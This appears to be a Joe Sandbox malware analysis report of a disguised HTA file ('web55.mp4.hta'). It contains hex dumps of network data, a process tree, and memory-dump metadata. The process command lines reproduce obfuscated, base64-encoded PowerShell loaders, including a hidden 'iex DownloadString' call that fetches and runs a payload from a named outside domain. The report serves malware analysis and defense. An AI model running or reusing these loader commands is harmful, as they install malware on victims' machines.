                                                      2025-01-08 12:56:45 UTC16384INData Raw: 39 05 ef 14 08 06 41 05 29 03 0e 06 89 02 49 10 04 05 89 02 1e 18 06 00 89 02 e6 07 69 00 0e 00 38 01 33 06 29 00 a3 00 04 08 2e 00 0b 00 dc 07 2e 00 13 00 e5 07 2e 00 1b 00 04 08 2e 00 23 00 0d 08 2e 00 2b 00 19 08 2e 00 33 00 45 08 2e 00 3b 00 4b 08 2e 00 43 00 0d 08 2e 00 4b 00 61 08 2e 00 53 00 45 08 2e 00 5b 00 45 08 2e 00 63 00 79 08 2e 00 6b 00 86 08 2e 00 73 00 93 08 49 00 a3 00 04 08 c0 00 83 00 e1 08 e3 00 9b 00 c1 0a e3 00 93 00 4f 09 e3 00 ab 00 4f 09 00 01 8b 00 19 09 03 01 ab 00 4f 09 03 01 9b 00 02 0b 80 01 93 00 4f 09 80 01 9b 00 54 09 a0 01 93 00 4f 09 a0 01 9b 00 54 09 a0 01 a3 00 78 09 43 02 ab 00 4f 09 63 02 ab 00 4f 09 83 02 ab 00 4f 09 a3 02 ab 00 4f 09 c0 02 93 00 4f 09 c0 02 9b 00 54 09 c3 02 ab 00 4f 09 e0 02 93 00 4f 09 e0 02 9b
                                                      Data Ascii: 9A)Ii83)....#.+.3E.;K.C.Ka.SE.[E.cy.k.sIOOOOTOTxCOcOOOOTOO
                                                      2025-01-08 12:56:45 UTC16384INData Raw: 65 00 73 00 63 00 72 00 69 00 62 00 65 00 00 0d 64 00 65 00 73 00 65 00 72 00 74 00 00 0d 64 00 65 00 73 00 69 00 67 00 6e 00 00 09 64 00 65 00 73 00 6b 00 00 0f 64 00 65 00 73 00 70 00 61 00 69 00 72 00 00 0f 64 00 65 00 73 00 74 00 72 00 6f 00 79 00 00 0d 64 00 65 00 74 00 61 00 69 00 6c 00 00 0d 64 00 65 00 74 00 65 00 63 00 74 00 00 0f 64 00 65 00 76 00 65 00 6c 00 6f 00 70 00 00 0d 64 00 65 00 76 00 69 00 63 00 65 00 00 0d 64 00 65 00 76 00 6f 00 74 00 65 00 00 0f 64 00 69 00 61 00 67 00 72 00 61 00 6d 00 00 09 64 00 69 00 61 00 6c 00 00 0f 64 00 69 00 61 00 6d 00 6f 00 6e 00 64 00 00 0b 64 00 69 00 61 00 72 00 79 00 00 09 64 00 69 00 63 00 65 00 00 0d 64 00 69 00 65 00 73 00 65 00 6c 00 00 09 64 00 69 00 65 00 74 00 00 0d 64 00 69 00 66 00 66 00 65
                                                      Data Ascii: escribedesertdesigndeskdespairdestroydetaildetectdevelopdevicedevotediagramdialdiamonddiarydicedieseldietdiffe
                                                      2025-01-08 12:56:45 UTC16384INData Raw: 6d 00 70 00 00 09 73 00 77 00 61 00 70 00 00 0b 73 00 77 00 61 00 72 00 6d 00 00 0b 73 00 77 00 65 00 61 00 72 00 00 0b 73 00 77 00 65 00 65 00 74 00 00 0b 73 00 77 00 69 00 66 00 74 00 00 09 73 00 77 00 69 00 6d 00 00 0b 73 00 77 00 69 00 6e 00 67 00 00 0d 73 00 77 00 69 00 74 00 63 00 68 00 00 0b 73 00 77 00 6f 00 72 00 64 00 00 0d 73 00 79 00 6d 00 62 00 6f 00 6c 00 00 0f 73 00 79 00 6d 00 70 00 74 00 6f 00 6d 00 00 0b 73 00 79 00 72 00 75 00 70 00 00 0d 73 00 79 00 73 00 74 00 65 00 6d 00 00 0b 74 00 61 00 62 00 6c 00 65 00 00 0d 74 00 61 00 63 00 6b 00 6c 00 65 00 00 07 74 00 61 00 67 00 00 09 74 00 61 00 69 00 6c 00 00 0d 74 00 61 00 6c 00 65 00 6e 00 74 00 00 09 74 00 61 00 6c 00 6b 00 00 09 74 00 61 00 6e 00 6b 00 00 09 74 00 61 00 70 00 65 00 00
                                                      Data Ascii: mpswapswarmswearsweetswiftswimswingswitchswordsymbolsymptomsyrupsystemtabletackletagtailtalenttalktanktape
                                                      2025-01-08 12:56:45 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2025-01-08 12:56:45 UTC16384INData Raw: 07 06 64 00 d4 02 00 ff ff 00 b2 00 00 06 b8 0a 75 06 26 01 76 00 00 00 07 06 70 01 e9 02 00 00 02 00 bc 00 00 06 c2 08 00 00 03 00 1b 00 00 41 01 07 01 01 11 21 32 04 12 15 14 02 04 23 21 11 21 32 36 36 35 34 26 26 23 21 11 04 15 01 fb b6 fe 05 fd 5d 03 27 e9 01 48 ae b0 fe b3 ec fd fd 01 bc 7d a4 51 51 a5 7d fe dc 05 41 fc f1 75 03 10 fb 33 08 00 b1 fe c7 cc cc fe c8 ae 01 5b 57 9b 65 66 99 55 f9 62 00 02 00 63 00 00 08 fb 08 00 00 18 00 23 00 00 41 21 35 26 36 24 33 21 32 04 12 15 14 02 04 23 21 11 21 11 23 22 06 06 17 01 21 32 36 36 35 34 26 26 23 21 01 e6 fe 7e 01 8e 01 07 b6 03 6f e9 01 48 ad b0 fe b3 ec fe 94 fe 50 47 53 58 1f 01 02 c0 01 26 7d a3 52 52 a4 7e fe dc 05 27 c9 a1 ed 82 b1 fe c7 cc cc fe c8 ae fd 68 06 9e 4d 75 3e fe 55 57 9b 65 66 99
                                                      Data Ascii: du&vpA!2#!!26654&&#!]'H}QQ}Au3[WefUbc#A!5&6$3!2#!!#"!26654&&#!~oHPGSX&}RR~'hMu>UWef
                                                      2025-01-08 12:56:45 UTC16384INData Raw: ff 98 fe 19 03 66 08 00 06 26 02 d3 00 00 00 07 08 62 04 d2 00 00 ff ff ff 4b fd ba 03 b3 08 00 06 26 02 d3 00 00 00 07 06 89 04 ec 00 00 00 01 00 aa ff ed 03 5a 08 00 00 0f 00 00 53 21 11 16 16 33 36 36 37 13 06 06 07 06 26 27 aa 01 aa 01 33 3e 20 24 0c 44 21 5f 50 f5 ea 01 08 00 f9 cc 49 41 01 06 05 fe ca 0a 15 03 09 cb db 00 02 ff fe ff ed 03 76 08 00 00 03 00 13 00 00 41 15 01 35 13 21 11 14 16 33 36 36 37 13 06 06 07 06 26 27 03 26 fc d8 c9 01 aa 34 3d 21 23 0d 43 20 60 4f f5 ea 01 05 35 ec fe fd ec 03 ce f9 cc 49 41 01 06 05 fe ca 0a 15 03 09 cb db ff ff ff 8c ff ed 03 72 08 00 06 26 02 e2 00 00 00 07 07 fe fe d6 00 0b ff ff ff 23 ff ed 03 dd 08 00 06 26 02 e2 00 00 00 07 07 bd ff 23 00 11 00 02 00 2f ff ed 05 6a 08 00 00 1c 00 2c 00 00 41 21 22 26
                                                      Data Ascii: f&bK&ZS!3667&'3> $D!_PIAvA5!3667&'&4=!#C `O5IAr&#&#/j,A!"&
                                                      2025-01-08 12:56:45 UTC16384INData Raw: 00 08 00 00 01 00 ba 00 00 06 cc 08 00 00 16 00 00 41 21 32 04 12 07 16 02 04 23 21 11 21 11 21 32 36 36 27 36 26 23 21 01 cf 01 e8 f4 01 61 c0 01 01 c0 fe 9f f4 fd 03 01 b0 01 4d 75 a0 53 01 01 b9 af fe 18 05 0b 9d fe e2 c2 c1 fe d9 a6 08 00 f9 5c 55 8d 54 7a a9 00 02 00 85 00 00 0b f2 08 00 00 11 00 28 00 00 73 11 37 3e 02 12 37 13 21 11 21 03 02 02 06 06 23 01 21 32 04 12 15 14 02 04 23 21 11 21 11 21 32 36 36 35 34 26 23 21 85 35 4a 73 53 33 09 21 04 36 fd 5d 21 0e 59 a1 f5 ac 06 06 01 e8 f3 01 61 c0 c0 fe 9f f3 fd 02 01 b1 01 4d 74 a0 53 b9 ae fe 18 01 5e 03 03 42 a6 01 32 f3 03 8f fe a2 fd 3a fe e5 fe 82 e1 62 05 0b 9d fe e2 c2 c1 fe d9 a6 08 00 f9 5c 55 8d 54 7a a9 00 02 00 b2 00 00 0b e4 08 00 00 07 00 1e 00 00 73 11 21 11 21 11 21 11 01 21 32 04
                                                      Data Ascii: A!2#!!!266'6&#!aMuS\UTz(s7>7!!#!2#!!!26654&#!5JsS3!6]!YaMtS^B2:b\UTzs!!!!2


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:07:55:01
                                                      Start date:08/01/2025
                                                      Path:C:\Windows\SysWOW64\mshta.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:mshta.exe "C:\Users\user\Desktop\web55.mp4.hta"
                                                      Imagebase:0x100000
                                                      File size:13'312 bytes
                                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:7
                                                      Start time:07:55:03
                                                      Start date:08/01/2025
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFCdkFIY0FiZ0JzQUc4QVlRQmtBRk1BZEFCeUFHa0FiZ0JuQUNnQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QWR3QmxBR0lBTGdCckFHd0FhUUJ3QUdRQWVRQjNBRzhBZWdCcEFIa0FMZ0J6QUdnQWJ3QndBQzhBYXdCMUFHNEFiZ0JoQUhJQUxnQndBRzRBWndBbkFDa0FLUUJnQUNJQUlnQWdBQzBBVndCcEFHNEFaQUJ2QUhjQVV3QjBBSGtBYkFCbEFDQUFTQUJwQUdRQVpBQmxBRzRBOy4gJGVudjpUZW1wXGEucHMxOyBmdW5jdGlvbiBLeUdZclVVRCgpe2Z1bmN0aW9uIGV6cENNZGhHUSgkckhQZWIpe2lmKCEoVGVzdC1QYXRoIC1QYXRoICRUaEJFWHBpVk8pKXtjdXJsIChLRmJDICRySFBlYikgLW8gJFRoQkVYcGlWT319fUt5R1lyVVVEOw==')))
                                                      Imagebase:0x740000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:8
                                                      Start time:07:55:03
                                                      Start date:08/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:9
                                                      Start time:07:55:04
                                                      Start date:08/01/2025
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\system32\cmd.exe" /k start powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;"
                                                      Imagebase:0x410000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:10
                                                      Start time:07:55:04
                                                      Start date:08/01/2025
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;"
                                                      Imagebase:0x740000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:07:55:04
                                                      Start date:08/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:07:55:05
                                                      Start date:08/01/2025
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A
                                                      Imagebase:0x740000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:07:55:06
                                                      Start date:08/01/2025
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))"
                                                      Imagebase:0x740000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:07:55:06
                                                      Start date:08/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:19
                                                      Start time:09:50:49
                                                      Start date:08/01/2025
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                      Imagebase:0x740000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:20
                                                      Start time:09:51:03
                                                      Start date:08/01/2025
                                                      Path:C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe"
                                                      Imagebase:0x26a56550000
                                                      File size:598'528 bytes
                                                      MD5 hash:89470385FDDACB118DEB7A7941E6A666
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 42%, ReversingLabs
                                                      Has exited:false

                                                      Reset < >
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3700467812.000000000B220000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B220000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b220000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !
                                                        • API String ID: 0-2657877971
                                                        • Opcode ID: fbd9ce239168bc7338e7cddf29ecc59ff6ba6b81ba95dc8a1897f0c5f91b99f0
                                                        • Instruction ID: 23ae6f47d026437cf1c4930074464194f8e6a9bd18ff1da34a1a164ab0236dcb
                                                        • Opcode Fuzzy Hash: fbd9ce239168bc7338e7cddf29ecc59ff6ba6b81ba95dc8a1897f0c5f91b99f0
                                                        • Instruction Fuzzy Hash: FD411330B24225AFEB248F58C8C17AEBBE5EB85714F404569EE95DB381C3B09C5487A2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3697566938.0000000006590000.00000010.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6590000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                        • Instruction ID: fa57662f1034b7c7c3783c126cd2847d19b93af6d09d97e26ac96d297c4fef6a
                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                        • Instruction Fuzzy Hash:
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3697566938.0000000006590000.00000010.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6590000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                        • Instruction ID: fa57662f1034b7c7c3783c126cd2847d19b93af6d09d97e26ac96d297c4fef6a
                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                        • Instruction Fuzzy Hash:
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3697566938.0000000006590000.00000010.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6590000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                        • Instruction ID: fa57662f1034b7c7c3783c126cd2847d19b93af6d09d97e26ac96d297c4fef6a
                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                        • Instruction Fuzzy Hash:
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3697566938.0000000006590000.00000010.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6590000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                        • Instruction ID: fa57662f1034b7c7c3783c126cd2847d19b93af6d09d97e26ac96d297c4fef6a
                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                        • Instruction Fuzzy Hash:
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3697566938.0000000006590000.00000010.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6590000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                        • Instruction ID: fa57662f1034b7c7c3783c126cd2847d19b93af6d09d97e26ac96d297c4fef6a
                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                        • Instruction Fuzzy Hash:
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3707036272.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 702fc094b2d0805d9bbd7f7c12261e5d348567517a5e9e205c9a9c9030c7d58a
                                                        • Instruction ID: a31aea2305c6b8d18445bb43332dbab28a420127ec67a4ecc0aac479ccdd2cab
                                                        • Opcode Fuzzy Hash: 702fc094b2d0805d9bbd7f7c12261e5d348567517a5e9e205c9a9c9030c7d58a
                                                        • Instruction Fuzzy Hash: 44713B78E002489FDB14DFA8D544BADFBF6BF88304F248469D416AB2A4CB34AD45CF41
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3707036272.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a9e7247ab01ffb1833f2bae7531d359298d9215bb7e66813f163b4321ceab831
                                                        • Instruction ID: 6347938fe6819bf15b646440e79d4959acf49e4535819f3c1782e5d46f145ff9
                                                        • Opcode Fuzzy Hash: a9e7247ab01ffb1833f2bae7531d359298d9215bb7e66813f163b4321ceab831
                                                        • Instruction Fuzzy Hash: AE614938A002188FDB19DBA4C9586AEBBF2FF89715F24846DD806EB390DB349C41CB51
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3707036272.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d9f999b709bef222fe53ebe66cf2186897e51e5d770df421b0a4f66d370f62bb
                                                        • Instruction ID: ab8499e3dd7927f468a1205ef7578f7c6df9ff7f34feb4172169b750d7fd9453
                                                        • Opcode Fuzzy Hash: d9f999b709bef222fe53ebe66cf2186897e51e5d770df421b0a4f66d370f62bb
                                                        • Instruction Fuzzy Hash: 66610D38A002498FDB14DFA4C544AADBBB6EF89304F258558E506AF365DB74ED89CF80
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3707036272.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
